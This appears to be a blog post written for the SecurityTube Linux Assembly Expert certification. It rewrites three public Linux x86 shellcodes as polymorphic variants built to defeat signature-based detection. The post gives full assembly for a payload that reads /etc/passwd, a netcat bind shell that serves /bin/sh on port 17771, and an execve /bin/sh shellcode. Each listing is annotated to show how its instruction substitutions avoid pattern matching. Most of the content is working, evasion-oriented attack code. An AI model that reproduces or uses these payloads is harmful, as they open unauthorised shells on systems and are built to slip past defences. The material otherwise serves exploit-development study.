Polymorphic shellcodes help defeat pattern matching. A great shellcode will combine not only the polymorphism in the shellcode but will combine a variety of techniques including encoding, encryption, and polymorphism. In this post, we will take up 3 different shellcodes and will convert them into the polymorphic ones. A polymorphic shellcode will not differ in the functionality, but we will use a variety of other instructions. This means that polymorphism is nothing but doing the same thing using a variety of different instructions.
/bin/cat /etc/passwd Shellcode
The first payload we will be using is from http://shell-storm.org/shellcode/files/shellcode-571.php . This shellcode is a simple /bin/cat shellcode and will display the contents of /etc/passwd file. The code is as follows:
; Polymorphic Version of /bin/cat Shellcode from http://shell-storm.org/shellcode/files/shellcode-571.php ; Author: Nipun Jaswal global _start section .text _start: ; xor eax,eax xor ecx,ecx ; Clearing out ECX ; cdq mul ecx ; Clearing EAX ; push edx push eax ; mov dword [esp-4], ecx ; Moving ECX to the TOP of the Stack ; sub esp,4 ; Stack Adjustment mov esi, 0x523e3f0a ; Actual Value - 22232425 add esi, 0x22232425 ; Adding the Value push esi ; Push Operation ; push dword 0x7461632f inc esi ; Avoiding Null Byte sub esi, 0x05f80101 ; Adjusting Second Value push esi ; Push Operation ; push dword 0x6e69622f mov ebx, esp push ecx sub esi, 0x09f1eebc ; Re-Using ESI, Beating Pattern Matching push esi ; push 0x64777373 sub esi, 0x03074444 ; Re-Using ESI, Beating Pattern Matching push esi ; push 0x61702f2f add esi, 0x02043601 ; Re-Using ESI, Beating Pattern Matching dec esi ; Avoiding Null Byte push esi ; push 0x6374652f ; Unchanged Section mov ecx, esp mov al, 0xb push edx push ecx push ebx mov ecx,esp int 0x80
We have commented out instructions from the original code and replaced it with a different set of instructions. We made use of ESI register instead of pushing the string directly onto the stack and performed an ADD operation to get the same value which was pushed in the original shellcode. To avoid null values we incremented ESI and performed subtract operation to get the second same value being pushed in the original shellcode.
Throughout the shellcode, we made use of ADD, SUB, INC & DEC instructions to completely defeat pattern matching. On compiling and Running the code, we get the following output:
Original Payload Length: 43 Bytes Polymorphic Version Length: 61 Bytes Change %age : 41% Increase
Netcat Bind TCP Shellcode
The next shellcode is a netcat bind TCP shellcode which allows you to connect to the port 17771 and presents a system shell. The original Shellcode can be downloaded from http://shell-storm.org/shellcode/files/shellcode-872.php and is 58 bytes in length. Using the similar approach we took for the previous shellcode, let see what a polymorphic version of the shellcode looks like:
; http://shell-storm.org/shellcode/files/shellcode-872.php ; Author: Nipun Jaswal (SLAE-1080) global _start section .text _start: ; xor eax, eax xor edx, edx ; Cleared EDX mul edx ; Cleared EAX ; push eax push edx ; EDX is Also Zero mov esi, 0x30363636 ; Instead of PUSH moved a Value to ESI add esi, 0x01010101 ; Addition Operation to Get the Same Value i.e. 0x31373737 push esi ; Push Op add esi, 0x21010101 ; Adding Random Value to ESI (Avoiding Null) sub esi, 0x20c7c20b ; Getting Back the Same Value i.e. 0x3170762d push esi ; Push Op ; push 0x31373737 ; push 0x3170762d mov esi, esp ; Moving ESP to ESI ; push eax push edx ; EDX is also Zero mov edi, 0x68732f30 ; Incremented Value to EDI dec edi ; Decrement the Value push edi ; Push EDI inc edi ; Incremented Again( Avoiding Null Byte) add edi, 0x05F632FF ; Same as 0x6e69622f (Adjusting the Value For Next Push) push edi ; Value Pushed ; push 0x68732f2f ;-le//bin//sh ; push 0x6e69622f push 0x2f656c2d ; -le/ remains unmasked mov edi, esp ; push eax push edx ; EDX is same as EAX mov edx,0x636e2f2e ; Decremented Value of EDX inc edx ; Increment EDX push edx ; Push EDX ; push 0x636e2f2f ;/bin//nc dec edx ; Back to the Original Value for Null Free OP add edx, 0xafb3301 ; Add Value to EDX push edx ; push 0x6e69622f mov ebx, esp xor edx,edx ; Since we Used EDX above, Zeroing it Out Here push eax push esi push edi push ebx mov ecx, esp ; mov al,11 mov al,12 ; Incremented dec eax ; Decrement int 0x80
The code is pretty straightforward. However, we only replace instructions which are relevant to the signatures. We made use of ESI again as we did in the previous shellcode. However, we are also making use of EDI register as well. On executing the shellcode:
Original Payload Length: 58 Bytes Polymorphic Version Length: 86 Bytes Change %age : 48% Increase
The last shellcode is execve shellcode from http://shell-storm.org/shellcode/files/shellcode-575.php and is 21 bytes in length. The shellcode does nothing much than popping up a shell locally. Let’s make a polymorphic version of it as follows:
;http://shell-storm.org/shellcode/files/shellcode-575.php ;Author: Nipun Jaswal (SLAE-1080) global _start section .text _start: xchg esi, eax ; Zero to EAX mov al, 0xb ; Mov Instead of PUSH ;push byte +0xb ;pop eax ;cdq push ecx ; ECX is also Zero ;push edx ;push dword 0x68732f2f mov esi, 0x68732f2f ; Value Moved to ESI push esi ; Pushed onto the Stack dec esi ; Value Decremented to Avoid NULL add esi, 0x5F63301 ; Added Value to Match Second Parameter push esi ; Value Pushed ;push dword 0x6e69622f mov ebx, esp ; Paramters to EBX ;xor ecx, ecx int 0x80 ; Interrupt
We used the same concepts like we did for the previous shellcodes. Original Payload Length: 21 Bytes Polymorphic Version Length: 22 Bytes Change %age : 0.4% Increase On running the shellcode, we get the following output:
Throughout this post, we saw that how a single operation can be done through a countless number of ways and making use of different instructions. In the next post, we will see how we can make our own crypter.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: